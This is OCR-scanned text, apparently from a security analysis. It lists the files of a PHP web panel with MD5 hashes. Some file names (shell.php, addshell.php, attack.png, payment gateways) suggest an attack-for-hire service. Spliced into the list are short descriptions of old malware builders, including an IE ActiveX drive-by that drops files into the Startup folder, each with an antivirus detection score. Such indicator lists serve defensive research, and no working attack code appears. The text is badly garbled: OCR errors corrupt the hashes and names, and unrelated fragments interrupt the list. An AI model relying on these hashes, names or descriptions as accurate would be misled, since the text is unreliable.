ca497edcbha35b7e487d463df6f9a0bc4 
style2.css 
a68ff93c6b5f87d9a0f7864bcb6cfal2d 
style3.css 
9733bef693ffd413d14749fed5d6aa2e 
support.php 
dff4b95b2c3c1d42e674ed9fa6c0d576 
thankyou.php 
347eda02579d6ae7a6623d98bal9e9c6 
tos.php 
e5d07df295b53ad215d801865e6c32d6 
updates.php 
caebd512d970cab7cfaf900e65653fe0 
vpn.php 
6b9ef7e9c96F23f94087427e6a98946Ff 
«htaccess 
ccff4f837bada2e59d67c980782986b2 
about _bg.jpg 
f0d651e3991c0b68446242dad29ee619 
about _icon.jpg 
62e7ce78da8a48aa6087f57100c0c59f 
about iconl.jpg 
521b0060873a9ac887ecb9611e85a041 
about icon2.jpg 
9e2e4504a748f35a77d8ca3ef00d0cde 
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about _img.jpg 
cd9650658d16dff800866718774f55e5 
account.png 
f06ed29a1f595ca0f6c55050d9286c76 
add.png 
10a937c911080e41b7cb9a9de9ba44ac 
admin.png 
f90a24ef0c062f7d99195303d3eac446 
attack.png 
5965277bf3794e776d63720dfd6efb34 
background _bg.jpg 
40b20922be99d2ac534507e7b57787c1 
banner.jpg 
65c2fbb5df917db0c7aclee0c89108e0 
banner2.jpg 
9a14e47eac884745clbc8e3f001ea292 
banner3.jpg 
9a14e47eac884745clbc8e3f001ea292 
banner3.png 
ed515f0ca0f314e4340e682e4b942268 
banner4.png 
ed515f0ca0f314e4340e682e4b942268 
bannernewl1.jpg 
acd14e7832a9b9944e28126b85571ea0 
bannernew2.jpg 
17ff2119cfde7948ef52887b421620ab 
bannernew3.jpg 
905989ee1ae57de408d02520cb3491a7 
banner _background.jpg 
49e470de25eefd4cf65e335c9leac4e8 
bg.gif 
fo2ce9ab9c5bO0f6df442fa7d77b77978 
blog _bg.jpg 
41895eb74885ecab938f9fec6be1417f 
blog bottom.jpg 
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a03d8dbb4849f83a3e06a99fe9784b24 
blog _top.jpg 
26245499b432f53c52c3c24e76b0fe9a 
body _bg.jpg 
82acc71340d17ca597229670c8ccd6b8 
body bgl.jpg 
65877ee38laaa9e8a2b881ffe2253fee 
box.gif 
5b37c7dde228dac26cdce2ce9eccedad 
cancel.png 
6bf9ba341234639d4550602fd35e0988 
company _iconl.png 
bd7dd06171d308ac96299adca8b7881b 
company _icon2.png 
38bc733cc36375431cf6bc6afl8a760f 
company _icon3.png 
60a287299c7d06254b312d0fb0f87e15 
company _icon4.png 
597d29b7e96c7a81ba01239b7e8d501a 
contact iocn.jpg 
f88e8a22cb17c81a4fe4e47b312e9d25 
delete.png 
6bf9ba341234639d4550602fd35e0988 
faviconl.png 
db624fe54779b11cb6b88a29989f0Fc9 
footer bg.jpg 
b0eaeed24bdd99b1b921f8591928e879 
footer _iconl.jpg 
f8fbf36a6d5883579158ebc464bd17c5 
footer _icon2.jpg 
f360db07aada22fdab52b1561ef314d7 
footer _icon3.jpg 
12b148dfa0d2a467cda683913d38999b 
footer _icon4.jpg 
98f56f71fd339501793bf603c60237a6 
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footer _line.jpg 

bd17178173e8783040fe5943210218fa 

get _bg.jpg 

34250f8da8c8e28ace285cfe009e7793 

get _icon.png 

77¢cb1e4853f5adf97ec5256933fd6092 

heading _bg.jpg 

79e€439b43e3alcf9e9a83a9cbd1159b2 

heading _bor.jpg 

b1866037554635146e136d4afe89cef8 

home.gif d2c93d8510e7fc077f9ef7 765ff20a89 

hub.png 

fdeaf68ba6e3b0ba507a55ee85143307 

info.gif 8f3e812905f59a0e70755650a8a9b271 

info.png Obad85f30b97b1d1011c8161c66443f4 

input _bg.jpg 

12f246571e239a599c7a9d7f38c2291b 

key _icon.png 

1cf5178b065b7f99f6209f5893393b9b 

logo.jog 04e1002340c71ff51b1501903374ce57 

more _button.png 

3e78a9c886cb74b24d7d6d968e092f62 

more _button1l.png 

affo2dd02d0323fccf46c7acl4c78d5c 

more _button2.png 

8d430bfd6c6ca3eabeee91cde2ba89F9 

more _button3.jpg 

5eb77ba03d9c17842db76aldbedac394 

more _button3.png 

623af554f967e263f0e25ac68b9e8e00 

more button _hover.png 

20c852ebdbd0da32c21894065252481b 

navigation.gif 

fd2b948223c1bc2e3b1885eb5d49b0a4 

news.gif 8b0a1312d184260ea42506f66298da5d 
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our h2_bg.jpg 
09d6fb242052553e7df6d01a13d3786b 
our inner blog _bg.jpg 
4bcdee2fb7fe5c30ae03958ae814c91f 
our inner blog bottom.jpg 
b32b18af5ccad292c3207bf4c1f89175 
our inner blog bottom.png 
5931a49b817c65ec33f8835a5c20817b 
our inner blog _top.jpg 
9b88a945b71b4807c3fb2d9falcc3fb7 
our inner blog top.png 
93948c79ea81ba29c9fb77072b6f3af2 
portfolio icon.jpg 
df707b155a9feb0balc169276ec26582 
portfolio imgl1l.jpg 
4470ee261159d02c7a581627ee73a45a 
portfolio img2.jpg 

8e02efb82446420a7 1leeb4e0b89b9f6F 
portfolio img3.jpg 
ba6bd8ab2d59b8d5d0c9d1028ad7b345 
p _border.jpg 
4d83ec25b6f5485c8c833b77ec37ac82 
question mark _icon.png 
7f716c0178b9dbea58e5415f1f4d700e 
send.jpg 5db26c3ae7clb5a6ce713bedc2153eb0 
service _iconl.jpg 
73a2106867256bae149d8e33718a817e 
service _imgl.jpg 
2b19d2a163c84fc5db03d869f4f50ba7 
service img2.jpg 
lcdfae3f87de9c2c4951fc2e476f55d2 
service _img3.jpg 
6e4ccd8c3b394cb561f44e18379fe893 
Slider bg.jpg 
a503593bed55b1ce582b59b1a67fc8b4 
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standard bg.jpg 
13460321633ddaa5371a30cc4f81ac87 
standard _bottom.jpg 
6ed49c8751b96b27330e5f8b595458f3 
standard top.jpg 
b9150f8d76a5a73940f025412b7fb990 
star _icon.png 
45d9358c65755f3ab34elaffOf4fo4fs 
styles.css 
596725dff5fe2e5416f4907ccc56c054 
ta-mark.png 
c38a91470f3c4de3017732702f065aff 
textarea _bg.jpg 
ea0a0c0551ef8e1d8865953d240764cc 
visit.png 
8a84a5d52aaa4b242af481969b9c774a 
VPN-OSX-setup01.jpg 
clabe6fa8d02b753dfff5020d7d4e538 
VPN-OSX-setup02.jpg 
6056b0d0b98b33e166916adc9a539d28 
VPN-OSX-setup03.jpg 
7ae7f3eebef731a34f3f17df4e5495bc 
VPN-OSX-setup04.jpg 
e€02d7073f01dc5baa8df00f297ee0cb1 
VPN-OSX-setup05.jpg 
bee8b7088c41f4d531635ca9102118f6 
VPN-OSX-setup06.jpg 
cdb74440f208cf7a0db46bd08def7264 
VPN-OSX-setup07.jpg 
d67e82125ab8a2cfe86971fbf5c4397b 
VPN-OSX-setup08.jpg 
885ee733743591537f142bd19e98a35c 
VPN-OSX-setup09.jpg 
65f3957c22f3176d4fe322e52ffb4546 
VPN-OSX-setup10.jpg 
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225e22a18984b71748dc7c122ea4b437 
VPN-OSX-setup11.jpg 
a24d90c459646bf95bf8ceb663ba33a9 
VPN-OSX-setup12.jpg 
197bf766042339f9af1f28d6e9303147 
VPN-OSX-setup13.jpg 
89e2a023297ff7ee42bd1a5dbb9a6167 
win7-setup01.jpg 
5f1f3aa88e70cb45508980aac1f7838d 
win7-setup010.jpg 
0f04c38070a873bb64dabbab0fc42535 
win7-setup011.jpg 
810a33b0e9709e693675b8c650b3b52F 
win7-setup02.jpg 
4187e42055cb1707c53303c1be7b5172 
win7-setup03.jpg 
719f781761dec118df69734686af0b22 
win7-setup04.jpg 
062f2c70da7138d0ad1966c968130a4c 
win7-setup05.jpg 
ad9fd28b5a66e9a14486643148d2ed5b 
win7-setup06.jpg 
cf511293f7ceef5df3e2aele5a73937e 
win7-setup07.jpg 
657fb307a40d55cffcO2dcc4d2a68cc3 
win7-setup08.jpg 
75dfd6732a446b8425cae456bfff35c6 
win7-setup09.jpg 
72257cd8ff7847694ffd10f007df0289 
1.jpg 
19c441e85da87f50ed0e7c361e1c75d0 
2.jPg 
4d62400c505aa5cab687be5195b28b39 
3.jpg 
83eldfal6fa3bd9a797572f6fald7c35 
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- Zephyrus 


Again relased around 2004, the description reads : "/ts a prove of concept tool to gen- 
erate a Stench MediaPlayer Exploit file more infos about stench can be found here 
[3]http://malware.comor at [4]hereAVP calls it exploit.win32.zephyrus" 


Result: 30/32 (93.75 %) 
1038 


4.jpg 
€38439bd6491f740912fe5f9b3fccf58 
5.JPg 
a090104f27f475e6925dd468f51cdc6f 
6.jpg 
82f89de0659be88elda2302e82dc6fac 
7.JPg 
572¢140f425111d2b4299a3a533980el1 
8.jpg 
bf34e71ff8effb62a5105fb22767a3b3 
9.jpg 
60ded9b15e56b5594cc80363bf16f25c 
EpiCurl.php 
87519746acfd86a4eee60b297cf29929 
ezSQL.php 
542ae04084746ebe5c1436aad5620854 
ezSQLCore.php 
7fed28721c8597a095f23832f98d53c5 
functions.php 
21bd3f76edc7b550d21c2f580454fa78 
count.js fal7e54d6f5acda595b954d16fa8ae34 
ie6.js 
41ecb197c941b8ce2647d932109bf861 
jquery-1.3.1.min.js 
5018fce9eaf1431e83fca0de4a735ef4 
jquery-1.3.2.min.js 
7d91ff87b2c0439ac76c5afObccb877b 
jquery-1.4.4.min.js 
b76fc63a9c3fc4293fb90990818dd100 
jquery.validate.js 
380280a6dbal4ec4cdab6ad0932d8d7e 
pnogfix.js 

9e47d6652eb0e7 3c2efd94a7489f6F32 
selectAllCheckBoxes.js 
cf29c8b3d2a431732a8f838c5609d26d 
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ie6.css 

style.css 
e3e12fcfbo84128114a05fef0bc4471 ff 
«htaccess 

account.php 
7db7146835e438012cal18afdaa7609fd 
activate.php 
ea3cdcc2bb0a442dffde088e4d10ba0c 
autoboot.php 
7809163227c208706cd3c840a2caal6b 
contact.php 
841b9dc454952deb5897c73e609eeafb 
down.php 61215ee90cadd68c9948ade08af5874F 
error_log 
21ef244c41db774eeb0987ee0f95c37b 
footer.php 
812c847b9c000c8b84f93d19b194eb0b 
gummiebears.zip 
457f7bc827dee9b39553e5329a5d28ba 
header.php 
40dbfb1f1f385509b04de98cad93d922 
hub.php 
f4aa852e8ce0c51a9f0635fbed81d370 
index.php 
1128b28a60d7992be3e60a82646fcdd2 
init.php 019c90c9da7ae90afbeb8b447497876c 
key.php 
4154f4668809006bc2b95f5cbbe44319 
license.html 
23b658def11b45727d3351702515f86af 
logout.php 
20561063898296b0d1cbc5a9ea3cda2c 
plans.php 
ff62664bfdaeffc5918d32a4be55d315 
register.php 
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5d541c4f2922de237fcf782d6a86eb39 
shell.php 
72e1bd4802949cc6a4ae9e94161ce6al 
addshell.php 

7629061011 bccflcf23e829824b80be0 
backup.php 
7f9d6c01fac338c64748df03c70cf369 
builder.php 
4a9d68ae7ebd48ad5ab63c6592fldaa2 
config.php 
04fb455c212c7c7b5d530daab0cc201f 
controller.php 
d8b8211336b1ce7498df1a41e2299da0 
error_log 
f4a34585300f114191e9df0b813b33d9 
footer.php 
812c847b9c000c8b84f93d19b194eb0b 
gateways.php 
c3e1170e9b26e0052b4a53b54d826b8a 
header.php 
cc4b87f53f7c5c5d2f61a21003de443f 
help-cron.php 
a72a2ed4443d059078b0c34d0a7d4615 
help-login.php 
061e32b9d8a07fb0385a5670db3596e8 
help-member.php 
¢71f5337f2bb38b41758b12d9bb6c2ec 
help-redirect.php 
ea22501a2c9556bb671158231ef29cae 
index.php 
e77d3cde791cf786b108a09a42039786 
login.php 
be9cd11fa8c7206e9cecald59099f2e4 
logout.php 
a7ed9729fcbcea4b3703e7024b519da3 
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logs.php e11ba3d7b1d879ac1c4f0451b16cb1b1 
main.php 551799a564890652050b6bb88a73b7d6 
maintenance.php 
f1b13c1836cc544503488a6c2f981129 
memberships.php 
4ebe06b5ab7ec9835bba2dfdcd3b0084 
news.php 9ea54426f13c30c9199c9aa56dbdc059 
newsletter.php 
f2bea615309a0d13150ed09b3d784abd 
shells.php 
3b82b5d6de21e8e1de00824b677e2a8f 
templates.php 
2ac538bade1309ff5658f29390b8b3f1 
transactions.php 
9c4674610464d591b957994dc8769427 

users. php 
a025ab5bd73d65f522a8535cb57b381b 
test.sql 

controller.php 
1b7e0077884d1d3444e3c722cb4df3a8 
index.php 
2376284b28c98a2b93ad665e68870726 
sendmail.php 
ec251807eba72561403f4492d493b4a4 
user.php 7al56fef4d4eeeafb166ceb89408f437 
excanvas.min.js 
df0bc1e5969f5eb559cb0ee10dfb135e 
front.css 
ed38d17da2d3a457686c5582550985b1 
global.js 
2¢c2050a42ca913b3d1ab51ed00311ce9 
jqplot.barRenderer.min.js 
6828b794badc877abf84404e5a461fab 
jqplot.canvasAxisLabelRenderer.min.js 
933bfafedbd297023ff8da4f298d1551 
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jqplot.canvasTextRenderer.min.js 
8bb8b6alef2d2e440fcf2529074289757 
jgplot.categoryAxisRenderer.min.js 
77309723f8b9fadeb5f03ef13c6422d0 
jgplot.pointLabels.min.js 
24d311537956d1a48ad691f6892ed2e1 
jquery-1.3.2.min.js 
7d91ff87b2c0439ac76c5afObccb877b 
jquery-1.4.4.min.js 
b76fc63a9c3fc4293fb90990818dd100 
jquery-ui-1.8.13.custom.min.js 
c15ec9e2245deb1c117b27157fb3c720 
jquery.jqplot.css 
d68f278650e9cff74efef8d3e4bbace9 
jquery.jqplot.min.js 
0014f3b6a5a6742c02f47ae6Cc835f297 
jquery.js 
3b4de51089243a2ecb66585517c444c5 
login.css 
a8b81d322975c4bcclebb287635b3dae 
style.css 
802a5c5ac71fceceba71c1l6dcld6cdel 
tooltip.js 
7303aa6c863b4d6732d6ed1c7b8b138c 
jquery.cleditor.css 
8c79c9e718a4024e6de762d30a75a67d 
jquery.cleditor.js 
631ba7415a41b1c01d294d061bf046f9 
jquery.cleditor.xhtml.js 
aacb1d84903170f9f7a5dd130093e8cb 
buttons.gif 
a86ace701deaaee9b4ee8c9e5d765faa 
toolbar.gif 
f0c4c53f05ac8344151a52338999d4f2 


maven _pro_regular-webfont.eot 
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e5b29e874900bf512bcbO0f5bdf090c47 
maven pro _regular-webfont.svg 
d3bd1794a5efb521e6f1f38322c99bf4 
maven pro _regular-webfont.ttf 
20b438d1bb91e4f1e87d05b024d93378 
maven pro _regular-webfont. woff 
c6c459abf614d24971a137cc95d22378 
jquery-ui.css 
ebcc2f907ea4e44553b0ec71cc565864 
ui-bg flat_O aaaaaa_ 40x100.png 
2a44fbdb7360c60122bcf6dcef0387d8 
ui-og flat _75 _ffffff 40x100.png 
8692e6efddf882acbff144c38ea7dfdf 
ui-obg glass 55 fbf9ee 1x400.png 
f8f4558e0b92ff2cd6136781533902ec 
ui-obg glass 65 _ffffff 1x400.png 
e5a8f32e28fd5c27bf0fed33c8a8b9b5 
ui-obg glass 75 dadada_1x400.png 
c12c6510dad3ebfa64c8a30e959a2469 
ui-bg_ glass 75 e6e6e6 1x400.png 
f4254356c2a8c9a383205ef2c4de22c4 
ui-bg glass 95 feflec _1x400.png 
5a3be2d8fff8324d59aec3df7b0a0c83 
ui-bg _highlight-soft 75 cccccc _1x100.png 
72¢593d16e998952cd8d798fee33c6f3 
ui-icons 222222 256x240.png 
ebe6b6902a408fbf9cac6379a1477525 
ui-icons 2e83ff 256x240.png 
2b699a5e48d3c3957d03027d36a25e8bb 
ui-icons 454545 256x240.png 
119dd0c2e94ad689de873ef39fd43e6e 
ui-icons 888888 256x240.png 
9c46d7cab43e22a14bad26d2d4806d80 
ui-icons cd0a0a _256x240.png 
3e450c2a2c66328d9498e7001ad7197c 
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cron _jobOdays.php 
d9d9e26a30c3db7b9951ee206c03f2cf 
cron _job/7days.php 
283133f8c6fbc6461860f7297e4f8373 
index.php 
2376284b28c98a2b93ad665e68870726 
index.php 
2376284b28c98a2b93ad665e68870726 
form.tpl.php 
91bc426d697935d3622b25bb0ee4d413 
index.php 
2376284b28c98a2b93ad665e68870726 
ipn.php 
37833e41ac88415269dbcdb471b69c56 
MoneyBookers.png 
80dbdb1468f37b6978cba0761fec6458 
MoneyBookers _big.png 
fba3edd53ff1616c5a5894dbe7c733ee 
error_log 
5a0a823c5dfflab609953becfefecb94 
form.tpl.php 
0593d832025c8d62b2472d103063b479 
index.php 
2376284b28c98a2b93ad665e68870726 
ipn.php 
611835f9d2b68eb90f92c80509c69936 
PayPal.png 
3836b2ee767226e0237d5c1651ef42f3 
PayPal _big.png 
d42f3dd4e57560dfdebe6abcd518d1b1 
account.png 
a2ed3359ae44de25268987cb59d6f0a5 
activate.png 
eff8fb8f83a65b9e648c36d4748b53dd 


admin.png 
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41fl3aef05cf0d7ca0f5e133a6969a7a 
ajax-loader-big.gif 
al24a8def818dc5aa7eae8034497ad20 
alert-ico.png 
25d6821513329ca58b71a45b8adlea27 
background.png 
137b7e6b9b7780e923b9fe70ee1b19d9 
barl.png 2b5ecc7ace2029afdc9aal17186ff513 
bg-fade.png 
b43b3322197026ca4dd3e9d523e60611 
bg.png 
55e5993698ac4edd61a0c862acfldfec 
bullet-blue.png 
a6bf15a7d64d8770f46716756d11led8a 
bullet-white.png 
af456d858059af514eb611d9c16cb9b8 
button-alt.png 
da9bca02f8aa0d806b7a5e312b8f9682 
button.png 
0c603e7b452ec560b7005094187f013b 
calendar.png 
f6633d8d2ee24c63d7960087e531e51f 
cancel.png 
6bf9ba341234639d4550602fd35e0988 
chart-bg.png 
0c02581ba3928c981b4f3ed7e9d39b6b 
chart.png 
€2428d3a1d5b605a758376f44d558a73 
checkbox.png 
85a50d2cc0221c9175cbc7290d823fd4 
completed.png 
87e2ce8a4c61b874a05d4d66b3e6fe92 
config-ico.png 
754ddc7c237e61fb6e74e5b83d07f20c 
config-Irg.png 
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75bdb2cfd752a2bfbo2d7463293136f56 
coupon-Irg.png 
cb44ccfe3840a83132018833f1d5fa88 
db-new-bg.png 
bce7bcd51fa8d66897b7dde5c6b86659 
db-old-bg.png 
3965573145014elaaf1l427a5c9d867b9 
delete.png 
595eec46f388cc33a8662fa850e22033 
delete2.png 
1cb48d1lebd0f9190135f1316a8efd454 
down.png 330a021a0e8e408d03f7671f052fbe11 
edit.png ae2196788e813f656c749b146e71dc80 
email-ico.png 
f2d20b40561045a99b9d1db13e78b9bf 
email-Irg.png 
23b1c5c13a7cb46d5df73b415c7149ac 
error-ico.png 
8fea9666388262643e6b3385603cbc40 
gate-Irg.png 
2a50ebd61736b0b8c3c697622094e9f3 
help-ico.png 
7ee8c623d6b571e3f72eb8e61e7cO0aaa 
help-Irg.png 
7776¢c71594e2f7f17ca2232937fd240b 
help.png 67dbc27ae93667d0e9e8ba5323c22984 
home.png 6c78e5fa79e31a094b77256650781f68 
hr.png 
la86aeec9c2132d36bc76ab03410e528 
hr2.png 
81ca92fe34114a178f9171569bcc596b 
info-ico.png 
bd8704e013db283330b61a4a9f728dcf 
info.gif 8f3e812905f59a0e70755650a8a9b271 
info.png O5058bef3c8390d9fec20d8e7df5cae2 
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inputbox.png 
b8b9b0460f37ca8eb178d002be44fd3a 
latest-news.png 
24916d822aba6be13629cb22294e7064 
log-off.png 

4a31853f5757cf6fcf7 7aaf7264e42c3 
logoff.png 
a32b479b8ab82b64f2039046996f2647 
logout.png 
da575f56c727e5ced8b68290f8cc3736 
mailsend.png 
fodfccceld37e081dc839f4a4a9fee4f 
memberships.png 
61c7275414edd4abf3566cc464ced299 
mems-ico.png 
323b569d088a264d7cle4cbcdc4152b0 
mems-Irg.png 
6bO0cacbba733c885e7850970ca7ec007 
MoneyBookers.png 
lec602de04aaeldfidb5c9edafd084ea 
msg-bg.png 
c1c66269b64db578422c20ca907d0f65 
news-ico.png 
6b9b447cfdb3f623db8930e0e09770ad 
news-Irg.png 
fea299a4cfbf61c8473f2194bcfdb98e 
newsletter-ico.png 
d648d697b25986834c47f6d5219c3797 
newsletter-Irg.png 
f22f4565376d64a1c68364eb79f2674a 
no.png 
€3e6032a31a05b2a4d86f5110b1f3e45 
ok-ico.png 
db34b9a358984bdde8799601a3991e52 
PayPal.png 
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ae 
—— = 


Use Default Page Make an HEX nae 


Startup Method |——] 
[ Denial of Service [ inform | 


Browser Redirection es, a File Name 


- God's Will 


The description reads : "A GODMESSAGE page is an HTML page that works with an ACTIVEX 
bug founded in IE5.5/OUTLOOK/OUTLOOK EXPRESS. Thanks to this bug when someone view 
our godmessaged page he downloads an HITA file in his STARTUP FOLDER.’ 


Result: 32/32 (100 %) 


- Ed Html Infector 


Sabotage Help 


Internet Explorer 
ZoneAlarm 


Custom... ed (yrall nfector 


rr es Browse 


es Exit 


The description of the tool circa 2004 reads: "Ed HTML Infector is a verysimple tool that creates 
HTML file with an embedded executable file within." 


Result: 14/32 (43.75 %) 
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3bc16b9440fd3f0b6e59f21527e0eea8 
pending.png 
fele19bde314c893bb5227ab71ada7a3 
radio.png 
0a82510b3313aaf56bf223b9bfd00a2d 
required.png 
€192817d2d2556190302b0ee2e045c29 
save2.png 
fc8ae7ecb136753afa48796be89b291e 
system-Irg.png 
f5e72e0b9c5a949916dd87014f990c62 
td-bg.png 
30120164ec697634402d20bc0cal0db2 
th-bg.png 
872d98b4cf0e4c81cda9e4483d558bde 
th-bg2.png 
182f24ace5dac859c4f95f3271080307 
tooltip.png 
07dbde5218b072204327cef9380d58b3 
trans-ico.png 
a2e73f9b428eb015631234a55ea94784 
trans-Irg.png 
31bd12a0eac4b19b2575630f03f94074 
user-ico.png 
e42f57c10fc5ae7d5699814d8419fa04 
user-Irg.png 
f847cda5e51415807f52b27afa943dfd 
u_active.png 
94e1ca46caf522cb189a0bfd0c120a47 
u_banned.png 
da17c09753c19ca21aa8646905d68e09 
u_inactive.png 
c174730c0f094b4a962ca2595a46a477 
u_pending.png 
7940ebf70ab8283873166f4c8dcOb8b1 
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visit.png 
8a84a5d52aaa4b242af481969b9c774a 
www.gif 
934148996ed24bdba7cOcb59eccf5beb 
xls.png 
fbo0c133355b0ed5a514464d5ae20d600 
yes.png 
63537940a51ceb8fb9492291fa1l41041 
class core.php 
f4e3688ebf004c9b4fa592fe79ba2c46 
class _db.php 
d310a33c5693643e4ac6787a98df54e0 
class dbtools.php 
e5bb0a411af8laf70cad1c1517c957cb 
class _filter.php 
5eddf170a4e4378fe0f95119863c023b 
class imageResize.php 
f59b3953440c2ba0ce51e708428790ce 
class _imageUpload.php 
d72e9e3de91b930de24956b9fca846ef 
class _mailer.php 
9718ae959b6e95ef1le84ce74b7c2b21d 
class membership.php 
470700d68cdce9f56ce65861d991ea36 
class paginate.php 
cc9fb32f564fc2bebb925498d71lacf9b 
class _user.php 
9e4fbd60291777d3748dfle9365a02f8 
config.ini.php 
4f6df509d3ea5b426cd00c2719803df8 
EpiCurl.php 
f93c199e12c6887cc9C29372c2b5bd0e 
ezSQL.php 
ddfe79a35ecde555acac28d20765a818 
ezSQLCore.php 
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7fed28721c8597a095f23832f98d53c5 
functions.php 
a7cd64d9c141b539d5e150dd019021ca 
headerRefresh.php 
€2511a53839613df7d8ca7b9e2d6afb1 
index.php 
2376284b28c98a2b93ad665e68870726 
mime _types.php 
cb5dd8b135364e8739491140d9bf5171 
preferences.php 
a9863646bd4d3b1d41lafa8d228fc770e 
swift _init.php 
6a53a30fa783a2797bfoddd08794a95e 
swift required.php 
b98f9885aeecee27aa7163allee04dc3 
swift required pear.php 
dfd678edd556ba9f42ac565730e41c8e 
Swift.php 
d34f9dea063cd0b60178c05923f03d8f 
Attachment.php 
310ea51fc20650192da8bleebec5f776 
CharacterReader.php 
b9ec82030d7ea8a71e27ac632d29c127 
CharacterReaderFactory.php 
29860d33cfOffa2aa6cb3532a1c9a08e 
CharacterStream.php 
a4c8206dfb457c3df3cba94c0988b82b 
DependencyContainer.php 
71f9cfb6b0aad5588c0f8917d8alff8e 
DependencyException.php 
bedc6e74ffe3d45a2c1013eac44d4a3c 
EmbeddedFile.php 
50102d0a2a887bf9866677edf94c0a76 
Encoder.php 
baa11190297347dd2d2b6e074aa290b9 
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Encoding.php 
4be1b06910f0ca4cabaafblde7b57138 
FailoverTransport.php 

065801 7ae6bf39dc0f19fc44f9239612 
FileStream.php 
1b9b5cldcb4f59fa8dda8c29459dc362 
Filterable.php 
9fb967c9b436c2c1a946294de31002b3 
Image.php 
5d1688cb259abf2a519adb6d7622ce97 
InputByteStream.php 
2ed26b5cbdda5e19f596c5cO0ac39f9ba 
loException.php 
2d285ef7a36ded97df33085ebdflaa9e 
KeyCache.php 
95add12fe2e6b5fc5b2d0dd9501b0808 
LoadBalancedTransport.php 
a539ef8fc872136fal0a5la9ea2aab22 
Mailer.php 
f95671e8aec00e7abe9c953f16f03f50 
MailTransport.php 
63bd85e811cda278ee8d1c97ff65353a 
Message.php 
c79a1235baa9115e52f2e353d49f4eb9 
MimePart. php 
f551c7af62eb28295e76a412986995cf 
OutputByteStream.php 
a8762f1dd74052b9f78da7383c6ada75 
Preferences.php 
094efle878a847elecfbf8a8a3df3d73 
ReplacementFilterFactory.php 
c59fb2f7a9b756bb3d59f34f3dcea4f5 
RfcComplianceException.php 
Oeb0ed1e7300472f15aa58fla22e3d21 
SendmailTransport.php 
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acb543240912bff240b017107a01e5c0 
SmtpTransport.php 
4dd0591ecd766fe5fe9b28b8c6f854f2 
StreamFilter.php 
e09d5e50f1f9d993155d66c0fb279e5f 
SwiftException.php 
a1c395272d9eaf369b6355b770f845d5 
Transport.php 
79bbfaee96ce06e8f84cal597b0beb55 
TransportException.php 
41927c5ff50e672ef43623ed9427a736 
AbstractFilterablelnputStream.php 
83cec31ad80d53beb3e6ea3f6c5a173b 
ArrayByteStream.php 
2b6514e91f80db8db7ed95fld14efe22f 
FileByteStream.php 
48clae069ae90d8a0c6105e8Ff2808d42 
GenericFixedWidthReader.php 
f8be36flaf132ac2335ae8dfb0187a13 
UsAsciiReader.php 
46cfc3612378acOb2dcbOcfb31d240f3 
Utf8Reader.php 
853300e9a8e119a80del2a78c2be90d8 
SimpleCharacterReaderFactory.php 
543ecee4bf901f15727a08d327fa7a53 
ArrayCharacterStream.php 
b9d3e7d8af75256ccacl05dcce0feb23 
NgCharacterStream.php 
83a0d6db389d3f7495803a359a238f62 
Base64Encoder.php 
ee09d623fe668f2622f3cd2395474784 
QpEncoder.php 
895c91c599357dad2edc5475998640a7 
Rfc2231Encoder.php 
0979925cd5f697cae6a8d23d1891941f 
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CommandEvent.php 
b6d268e48993e640b8170c5fid4ef3dd 
CommandListener.php 
7d2028d4475cc54dba40821ce0ad9c94 
Event.php 
9d86fbd806b027a51ed5176cO0cb80ed0 
EventDispatcher.php 
742f318bcb4ff73474757b40a7986a43 
EventListener.php 
f37fbefb51ffe29a0e5ee59315dc40cd 
EventObject.php 
417eb03a85ab8252a6fled6b8801f211 
ResponseEvent.php 
647dc2fa89cb025261b21d9db0e44ff8 
ResponseListener.php 
a8344e80df5c2e32c58454431d4c4bbc 
SendEvent.php 
0435e824b33b35eae12072202f89edd1 
SendListener.php 
34a660b59207e523f0f8684c75fbc38b 
SimpleEventDispatcher.php 
a590da09d93e627daf89809bc74fb111 
TransportChangeEvent.php 
00566df6f19077e03a385ec39b909f64 
TransportChangeListener.php 
d2702487e1313d7aeed746d0bccc433f 
TransportExceptionEvent.php 
de65dd4e09654ae4bc846f378a3a0ecl 
TransportExceptionListener.php 
6cfbc575f6é8efbc4f963d6b62dc0105d 
ArrayKeyCache.php 
58d8dff94026628e66103a5877b306f9 
DiskKeyCache.php 
2b5f3ecad8c21fé6éfea9d2ff676c50462 
KeyCachelnputStream.php 
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25a9178a9e8b03c064dceel12de412f48 
NullkKeyCache.php 
c5c611f36b9019832d25219616e735cf 
SimpleKeyCachelnputStream.php 
6dbd4027286040bfc14e97274ccee201 
ArrayRecipientiterator.php 
8568a84c90c7 7afd5b78ea437739774b 
Recipientiterator.php 
4ab937ace8b96018082d7006b659e62a 
Attachment.php 
c67916ccb0c56598dc5942ebb0e9d6e3 
CharsetObserver.php 
b56c52eab5381clebbc6f3eel111ba57b 
ContentEncoder.php 
aa86da6f82081a9e6c482494cdd7e543 
EmbeddedFile.php 
f4a500239bba0470ee23b1646adeff1d 
EncodingObserver.php 
5363e032fafoblde485e07da227511e14 
Header.php 
fd8fb12cabdc394e9901874009a0b3c1 
HeaderEncoder.php 
63b5e6dab187b40d69f2f1e4269bf9cd 
HeaderFactory.php 
36924acd27292275b5ea7740d08044eb 
HeaderSet.php 
025b5c3ae0297875caf94ddcf30dd62a 
Message.php 
7244b3c2e705f51c6ff9c3e5705698da 
MimeEntity.php 
ceel3c885efaeb070c131led9eef42098 
MimePart.php 
09294fba7b083cbca42c369f53f7cead 
ParameterizedHeader. php 
216d078a8c926a09db760237e4f34f7e 
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SimpleHeaderFactory.php 
96efOfObbb50dc923e01eac8b275c971 
SimpleHeaderSet.php 
clde5dcde0630c5a69382a8 7dfff4a99 
SimpleMessage.php 
d0efa2984b7cb9da7d5aa47139d18465 
SimpleMimeEntity. php 
58a8cf9364f2a551d4760d9685c08203 
Base64ContentEncoder.php 
817dcc6fabfc42132217485198b5fd65 
PlainContentEncoder.php 
84fb029357e7f92eb97 735cfa6260290 
QpContentEncoder.php 
50a6d21587b5d2bcf3c4eafd9d0f8e47 
Base64HeaderEncoder.php 
b96543098037eff20264984176ef0526 
QpHeaderEncoder.php 
46ce9b34de8414a1e7225f372824ab0a 
AbstractHeader.php 
ce899eal2be733a719cdb9dcb458e3e0 
DateHeader.php 
b11e51969e361351006edb73920fdb6d 
IdentificationHeader.php 
ced4f55fe365481702690916c94e4a6f 
MailboxHeader.php 
9232c3d5d9617fbc62dcd94ef1181fd3 
ParameterizedHeader.php 
fe0603f1bc575dc45c2d3f215cc61710 
PathHeader.php 
5d868eac0fa55a2878f1d80f49fb59a5 
UnstructuredHeader.php 
c49032ddd48852bb048c4ec47c7b0657 
AntiFloodPlugin.php 
919991390ac771lef7cecdal43f93f535 
BandwidthMonitorPlugin.php 
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627c9130596c0fa7f8812883739144ec 
DecoratorPlugin.php 
